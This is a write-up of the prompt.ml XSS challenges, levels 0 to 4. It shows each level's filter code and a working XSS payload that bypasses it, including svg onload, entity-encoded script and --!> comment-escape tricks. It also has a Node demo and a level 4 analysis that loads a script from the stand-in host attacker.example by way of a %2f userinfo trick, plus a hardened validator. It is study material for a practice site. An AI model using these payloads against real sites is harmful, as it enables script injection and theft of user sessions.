Prompt(1) Writeup - Part 1
This is a writeup on how to solve the Prompt(1) challenges. Prompt(1) is a series of XSS challenges where the goal is to get the page to execute prompt(1). Here's the link for the site: https://prompt.ml/. Let's go 😀
0
Here is the JavaScript source that this challenge uses.
function escape(input) {
    // warm up
    // script should be executed without user interaction
    return '<input type="text" value="' + input + '">';
}
The payload starts with " to close the value attribute and > to close the <input> tag, then inserts a script tag containing prompt(1). The trailing <svg src=" opens a new attribute so that the "> the template appends after our input is swallowed instead of being rendered as stray text.
Payload : "><script>prompt(1)</script><svg src="
1
function escape(input) {
    // tags stripping mechanism from ExtJS library
    // Ext.util.Format.stripTags
    var stripTagsRE = /<\/?[^>]+>/gi;
    input = input.replace(stripTagsRE, '');
    return '<article>' + input + '</article>';
}
Look at the regex: it only strips a tag that has a closing >. A tag that is never closed passes through untouched, and the browser closes it at the > of the </article> the template appends. A JSFuck-encoded <script>prompt(1)</script> (JSFuck reduces JavaScript to the six characters ()![]+) does not help here: its output contains no markup at all, so it lands as inert text inside the <article> element and nothing executes.

Payload : <svg/onload=prompt(1)//

The // turns the </article that ends up inside the attribute value into a JavaScript comment, so the onload handler still parses and fires.
2
function escape(input) {
    // v-- frowny face
    input = input.replace(/[=(]/g, '');
    // ok seriously, disallows equal signs and open parenthesis
    return input;
}
As the comment says, this strips equal signs and opening parentheses. The SVG element helps here: inside <svg>, the content of a <script> element is parsed as foreign (XML-style) content, so character references are decoded before the script runs, unlike a plain HTML <script>, whose body is raw text. The numeric character reference &#40; therefore stands in for ( and survives the filter.

Payload : <svg><script>prompt&#40;1)</script>
3
function escape(input) {
    // filter potential comment end delimiters
    input = input.replace(/->/g, '_');
    // comment the input to avoid script execution
    return '<!-- ' + input + ' -->';
}
Here the sequence "->" that would normally close the comment is replaced with "_". Luckily the HTML tokenizer also accepts "--!>" as a comment end (it is flagged as a parse error, but the comment is still closed), and that sequence does not contain "->". The trailing <!-- in the payload reopens a comment so the " -->" the template appends stays harmless.
Payload : --!> <script>prompt(1)</script><!--
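The four filters from levels 0 to 3, reproduced as shown above and run against a naive payload (which each filter catches) and the bypass payload (which survives), as an added example; this is not code from the prompt.ml site or from the original writeup. For level 1 it uses the unclosed-tag payload rather than JSFuck, since JSFuck output carries no markup and cannot execute inside <article>. The small entity decoder mirrors what the HTML parser does for <script> text inside <svg>; it is an assumption of this example, not something the challenge code does.

```javascript
// Added example, not code from the prompt.ml site or the original writeup.
// Level 0-3 filters exactly as on the page, plus a naive payload each filter
// stops and the bypass payload that gets through. Runs under Node, no deps.

const filters = {
  level0: (input) => '<input type="text" value="' + input + '">',
  level1: (input) => '<article>' + input.replace(/<\/?[^>]+>/gi, '') + '</article>',
  level2: (input) => input.replace(/[=(]/g, ''),
  level3: (input) => '<!-- ' + input.replace(/->/g, '_') + ' -->',
};

// Apply one level's filter and return the HTML the browser would receive.
function render(level, payload) {
  return filters[level](payload);
}

// Level 2 relies on the HTML parser decoding numeric character references in
// <script> text that sits inside <svg> (foreign content). This helper mirrors
// that decoding step (assumed here); a plain HTML <script> body is raw text
// and never gets it.
function decodeNumericRefs(text) {
  return text.replace(/&#(\d+);/g, (_, cp) => String.fromCodePoint(Number(cp)));
}

// What an SVG <script> would actually execute for a given level 2 payload.
function svgScriptBody(payload) {
  const m = /<svg><script>([\s\S]*?)<\/script>/.exec(render('level2', payload));
  return m ? decodeNumericRefs(m[1]) : null;
}

// "naive" is the obvious attempt the filter was written to stop; "bypass" is
// the payload that survives it. All payloads are constructed for this example.
const cases = {
  level0: { naive: '<script>prompt(1)</script>',            // stays inside value=""
            bypass: '"><script>prompt(1)</script><svg src="' },
  level1: { naive: '<script>prompt(1)</script>',            // closed tags: stripped
            bypass: '<svg/onload=prompt(1)//' },            // no closing >: kept
  level2: { naive: '<svg><script>prompt(1)</script>',       // ( is removed
            bypass: '<svg><script>prompt&#40;1)</script>' }, // &#40; survives
  level3: { naive: '--> <script>prompt(1)</script><!--',    // -> becomes _
            bypass: '--!> <script>prompt(1)</script><!--' }, // --!> untouched
};

// Rendered output for both payloads of a level.
function compare(level) {
  return {
    naive: render(level, cases[level].naive),
    bypass: render(level, cases[level].bypass),
  };
}

function demo() {
  for (const level of Object.keys(cases)) {
    const r = compare(level);
    console.log(`${level}\n  naive : ${r.naive}\n  bypass: ${r.bypass}`);
  }
  console.log('level2 script body after entity decoding:',
              svgScriptBody(cases.level2.bypass));
}

demo();
```

The level 1 and level 3 lines show the common thread: each filter matches on a delimiter (a closing >, the sequence ->) that the HTML tokenizer does not actually require, so a payload that omits or varies the delimiter passes the regex and still parses.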
4
function escape(input) {
    // make sure the script belongs to own site
    // sample script: http://prompt.ml/js/test.js
    if (/^(?:https?:)?\/\/prompt\.ml\//i.test(decodeURIComponent(input))) {
        var script = document.createElement('script');
        script.src = input;
        return script.outerHTML;
    } else {
        return 'Invalid resource.';
    }
}
The check and the use disagree: the regex is tested against decodeURIComponent(input), but the raw, undecoded input is what gets assigned to script.src, so the string that is validated is not the string the browser fetches. A percent-encoded slash (%2f) reads as / to the check but not to the URL parser, which lets the prompt.ml/ prefix be pushed into the userinfo part of a URL whose real host is somewhere else. This needs me to have a domain. I don't have one. There is a nice solution by cure53 at https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml#level-4.
Payload: None
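The decode-versus-raw mismatch in the level 4 check, as an added example (not code from the prompt.ml site or the original writeup): the regex is evaluated exactly as the challenge does it, and the host the browser would really fetch from is resolved with the WHATWG URL parser that Node and browsers share. The host name attacker.example and the path x.js are placeholders, not a real domain; the hardened variant at the end is this example's own suggestion.

```javascript
// Added example, not code from the prompt.ml site or the original writeup.
// Shows why validating decodeURIComponent(input) and then using the raw
// input in script.src is unsafe. attacker.example is a placeholder host.

const ALLOWED = /^(?:https?:)?\/\/prompt\.ml\//i;

// The check exactly as the level 4 code performs it.
function passesCheck(input) {
  return ALLOWED.test(decodeURIComponent(input));
}

// The host a <script src=input> on https://prompt.ml/ would actually load from.
// The raw input goes to the URL parser, never the decoded form.
function fetchedHost(input) {
  return new URL(input, 'https://prompt.ml/').hostname;
}

function evaluate(input) {
  return { allowed: passesCheck(input), host: fetchedHost(input) };
}

// Honest input: passes the check and really loads from prompt.ml.
const HONEST = '//prompt.ml/js/test.js';

// Malicious input (constructed): %2f decodes to / for the regex, so the check
// sees //prompt.ml/@attacker.example/x.js and passes it. The URL parser keeps
// %2f as-is, so "prompt.ml%2f" becomes the userinfo and the host is
// attacker.example.
const EVIL = '//prompt.ml%2f@attacker.example/x.js';

// Hardened variant (this example's suggestion): validate the same string the
// browser will use, compare the parsed origin instead of regex-matching text,
// and refuse any URL that carries credentials.
function safeScriptSrc(input) {
  let u;
  try {
    u = new URL(input, 'https://prompt.ml/');
  } catch (e) {
    return null;
  }
  if (u.origin !== 'https://prompt.ml' || u.username || u.password) return null;
  return u.href;
}

for (const input of [HONEST, EVIL]) {
  const r = evaluate(input);
  console.log(`${input}\n  passes check: ${r.allowed}\n  fetched host: ${r.host}` +
              `\n  hardened:     ${safeScriptSrc(input)}`);
}
```

The general rule this illustrates: canonicalise once, validate the canonical form, and then use that same canonical value; validating one representation and acting on another is what lets the check and the browser disagree.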
pl. continue
Thumbs up!!